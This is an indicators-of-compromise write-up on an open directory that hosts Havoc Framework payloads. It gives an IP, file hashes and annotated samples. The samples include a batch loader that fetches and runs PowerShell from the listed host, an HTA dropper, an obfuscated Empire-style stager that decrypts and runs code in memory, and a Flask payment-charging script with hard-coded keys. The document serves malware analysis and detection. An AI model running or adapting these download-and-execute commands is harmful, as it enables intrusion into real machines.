Havoc Framework IOCs
Jun 21, 2023
Persistence
Overview
An open directory (opendir) was detected hosting multiple payloads, including the Havoc Framework Daemon, the Zaqar Email Spoofer, a PowerShell loader, steganography tools, and several phishing/scam pages.
WZdUBCPW.jpeg
Screenshot

IOCs
IPv4
- 146.190.48.229
Files (MD5, filename)
- 05973b901ffe811e1a4f6e4ba4490508 cchome.exe
- a5ee41771304b0e3e42000ac93f20e13 hell.php
- 72cddf25aed48c79880082f7c3c9c94c help.php
- fae34b6aca2b3e512d690c36975653b8 shi.php
- 87926fa5d88b83c03af1cece27065b04 Chrome.exe
- d4286504d9fd691e8e9cd0c6202966f6 Google.exe
- 8ce637950af71b44469ceda82bd2760d Google3.exe
- 1ba533fdc0d6af3220b37b533e0cfcf4 Googlee.exe
- 05973b901ffe811e1a4f6e4ba4490508 cchome.exe (duplicate of the first cchome.exe entry)
- c8db2a63d6aca66e46b3ff75f71a7c65 download_and_open.exe
- 25b41ff52fc5b2ea9924fee5b003df41 fuackme100.exe
- 5d51a0529768f0c86b3fe99d8326b845 fuck.exe
- 0f216e0a1230d3191a7dcf850ad97a07 haeds.exe
- 02fc64fb8266e9c2f30c30f967fc7eef hey.exe
- d41d8cd98f00b204e9800998ecf8427e loser.exe (MD5 of an empty file — not a usable indicator)
- 8a873d4463884ad87edc0f1da16a0766 net7.0.exe
- 3baffae2c9dc65dd0d956bf5876fa7c4 openmyf.exe
- 313cf4c85059efd557ef6355f3ab7045 payload24.exe
- 5be4e5115cdf225871a66899b7bc5861 pics.exe
- 7d9accf060920368bdcc92b40a5b8690 uwuade.exe
- 81c37f904ee42d542c6cea29f0f1ef47 payload.dll
- eaef562c6995c02714a91f5a92ab4668 shellcode.bin
- 06c7dd98ff5b78872078c1f51cc9ba88 shellcode1.bin
- 30b80fd3e35c9960f1503cceaee766ab heyyy.hta
- 1e5e6855043f91a9cac96f5a7e39ab98 aild.py
- 8a23cf5d92fe0fc5de6818d49e8ee133 NFcmoOSI.html
- 9a4657e42cf710c73da89def0ddedc35 aah.html
- 59846e216edd60d6b76115ffa0d4ebff jak.html
- 5efa8b2f72a03463be31ef71852e47cc paaa.html
- ed134d442949c034f1caea2b34e4b1eb huh
- 46c567f4965f6381f5bc19a18bae0bbc launcher.bat
- 0aee080c6530030d020f7df6056fb7c7 php
- 810d62848e5277961345c0c6d6ac7118 WZdUBCPW.jpeg
launcher.bat
@echo off
REM Loader stage. Starts a hidden, non-interactive PowerShell (-w 1 hides the window, -nop skips
REM profiles, -nol drops the logo, -ep bypass disables the execution policy). The script block first
REM sets the WebClient proxy credentials to the current user's default network credentials (so the
REM fetch still works behind an authenticated corporate proxy), then downloads text from the listed
REM host on port 4053 with Invoke-WebRequest and pipes it straight into Invoke-Expression. This stage
REM writes nothing to disk; the "download/powershell/<base64>" path on that IP is the durable network
REM indicator (the path segment appears to be base64 of a plain-text option string, not a filename).
start /b powershell.exe -nol -w 1 -nop -ep bypass "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://146.190.48.229:4053/download/powershell/VHJ1ZTptYXR0aWZlc3RhdGlvbiBldHc=') -UseBasicParsing|iex"
REM Self-delete idiom: "(goto) 2>nul" ends the batch context without an error message, after which
REM del removes the script's own file (%~f0 expands to its full path), so the loader is gone on first run.
(goto) 2>nul & del "%~f0"
aild.py
from flask import Flask, request
import braintree
app = Flask(__name__)
# Braintree gateway set up against the Sandbox environment with the account values hard-coded inline
# (positionally these are environment, merchant ID, public key, private key in the Braintree SDK; the
# last string is a secret and is exposed in this recovered sample). Note the configure(...) call is
# never closed — the closing ")" is missing — so as listed this file does not parse; either the sample
# was incomplete or the listing lost a line. Treat the three strings as indicators of the operator's
# Braintree account, not as code to run.
braintree.Configuration.configure(
    braintree.Environment.Sandbox,
    "v2v28srx6mmzzfsv",
    "dpdf4h4gdb53vj5q",
    "05351842d6e450c78699f374bc20d3b3"
@app.route("/", methods=["GET"])
def generate_token():
    # GET / returns a freshly generated Braintree client token as the raw response body — the value a
    # hosted checkout form would fetch to initialise its payment widget.
    client_token = braintree.ClientToken.generate()
    return client_token
@app.route("/process_payment", methods=["POST"])
def process_payment() -> str:
    # Reads the payment_method_nonce posted by the client form (a missing field makes Flask answer 400)
    # and charges a fixed 10.00 with immediate settlement. The amount is set server-side, independent of
    # anything the form shows the user.
    nonce_from_the_client = request.form["payment_method_nonce"]
    result = braintree.Transaction.sale({
        "amount": "10.00",
        "payment_method_nonce": nonce_from_the_client,
        "options": {
            "submit_for_settlement": True
        }
    })
    # Only a generic success/failure string is returned; no transaction details reach the client.
    if result.is_success:
        return "Transaction successful!"
    else:
        return "Transaction failed"
if __name__ == "__main__":
    # Binds the Flask development server (no TLS) directly to the hosting server's public IP on
    # port 5000, so the checkout endpoint was reachable from the internet — a further network indicator.
    app.run(host='146.190.48.229', port=5000)
heyyy.hta
// HTA dropper. The base64-encoded command line was redacted when this page was archived; what remains
// shows the launch flags (-noP no profile, -sta single-threaded apartment, -w 1 hidden window,
// -enc base64-encoded command) typical of an in-memory stager.
var c= 'powershell -noP -sta -w 1 -enc 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'
// Launched through WScript.Shell.Run; when the .hta is opened by its normal handler (mshta.exe),
// powershell.exe appears as a child of mshta.exe — a useful process-tree detection.
new ActiveXObject('WScript.Shell').Run(c);
Partial Decode
# Reviewer notes on the recovered stager. The line below is reproduced as the page gives it; extraction
# has dropped punctuation (the "." / "[" / ".." operators and the commas between -f arguments), so it
# will not run as-is and is kept only as an analysis artifact.
#  - Type and member names are assembled at runtime with "-f" format strings to defeat string matching.
#  - Sets ServicePointManager.Expect100Continue = 0, builds a Net.WebClient with a spoofed browser
#    User-Agent, and routes it through DefaultWebProxy with DefaultNetworkCredentials (proxy-aware).
#  - The server URL (${SeR}) comes from a base64 blob decoded as UTF-16; the path ${T} is a scrambled
#    "/admin/get.php" and a fixed Cookie header is sent. That layout matches a PowerShell Empire-style
#    launcher rather than Havoc's own stager — worth keeping in mind when attributing this host.
#  - ${r} is an RC4-style routine (256-byte state, key-scheduling swaps, XOR keystream): the first
#    4 bytes of the download are an IV, the remainder is decrypted with IV + ${K}, and the result is
#    piped to IEX, i.e. executed in memory without touching disk.
# Detection: powershell.exe issuing HTTP requests with this User-Agent/Cookie pair to the listed IP,
# and any WebClient download whose output feeds Invoke-Expression.
SV ("V"+"xN") ([tYpE]("{1}{4}{0}{7}{8}{6}{2}{5}{3}"-f 'NeTserSYStntMaeREMNAGoIviCeP')); sET-iteM vaRIABlE:MB8 ( [tYpE]("{2}{3}{1}{0}" -f'IngOdtEXTEnC')) ; sV ('2'+'BU1') ( [TYPe]("{0}{1}{2}"-f'CONVErT') );sET 9SeLm ([Type]("{2}{4}{0}{1}{3}" -F'neTwEBreQusestySTem') ) ; sET-vaRiaBle Yg6N ( [tYpE]("{1}{3}{5}{0}{4}{2}"-f 'CSySeDeNtIalCaCHeTemrNET')) ; $o30= [tYPE]("{0}{3}{4}{2}{1}{5}" -f 'ScODINTextENYstEmG'); If(${PSVErsIonTABLE}"PsvERsioN""MajOr" -ge 3){}; $VxN::"ExpEcT100coNTINue"=0;${wC}=("{2}{0}{1}" -f 'jectNew-Ob') ("{4}{3}{2}{0}{5}{1}{6}"-f 'tebCleNSystemWient');${u}=("{3}{10}{9}{2}{5}{6}{0}{7}{4}{1}{8}"-f '1; WOW6Gec/50 (Mo70; rv:110) like Windows NT 64; Trident/kollazi');${SeR}=$( $mB8::"UNicode""GeTsTRing"( (geT-VAriABLE ('2'+'Bu1') -vAl)::("{3}{0}{1}{2}"-f'romBase64StringF')Invoke(("{14}{6}{9}{13}{5}{3}{8}{2}{12}{11}{10}{1}{4}{0}{7}" -f 'AADIAACQMwA0ADEAO0AHQAcAA6==AwAC8ALwAxADQANgAADkAOgAzAy4ANAA4AC4AMgAuaAB'))));${T}=("{3}{1}{2}{0}"-f'etphpadmin/g/');${WC}"hEaDErS"("{1}{0}" -f'ddA')Invoke(("{2}{0}{1}" -f'-AgentUser'),${u});${wc}"prOXy"= ( ITEm vArIAblE:9seLm )vALue::"dEFAUltWeBProxy";${wc}"PrOXy""CRedENtials" = $yG6n::"DEfAulTnETWOrKCREDENTIAls";${ScRIpt:PrOxy} = ${wC}"pRoxy";${K}= ( GEt-VARIABlE O30 -valu )::"ASCiI""GeTByteS"(((("{3}{2}{1}{5}{4}{0}" -f'oP^ns+=rw[A%4Iv;~6T)!FT21@0#(cEBLj')) -crePLacE ([chAr]70+[chAr]84+[chAr]50),[chAr]124));${r}={${D},${k}=${aRgs};${s}=0255;0255|&('%'){${J}=(${j}+${s}[${_}]+${K}[${_}%${k}"COuNt"])%256;${S}[${_}],${S}[${J}]=${S}[${J}],${S}[${_}]};${D}|('%'){${I}=(${i}+1)%256;${h}=(${h}+${s}[${I}])%256;${S}[${I}],${S}[${H}]=${s}[${H}],${S}[${I}];${_}-bxor${S}[(${S}[${I}]+${s}[${H}])%256]}};${wc}"HEAdErS"("{0}{1}"-f 'Add')Invoke(("{0}{1}" -f 'Cookie'),("{4}{2}{3}{0}{5}{8}{7}{6}{1}" -f 'o5K732VM+s=MqiKEsSUdzdUy=FipMsJ0R84bQgdZdak'));${dATA}=${wc}("{3}{2}{1}{0}" -f'adDataoownlD')Invoke(${SeR}+${t});${IV}=${DaTa}[03];${DATa}=${daTa}[4${DAta}"LENGTH"];-join[Char[]](& ${R} ${DATa} (${Iv}+${k}))|&("{1}{0}"-f'XIE')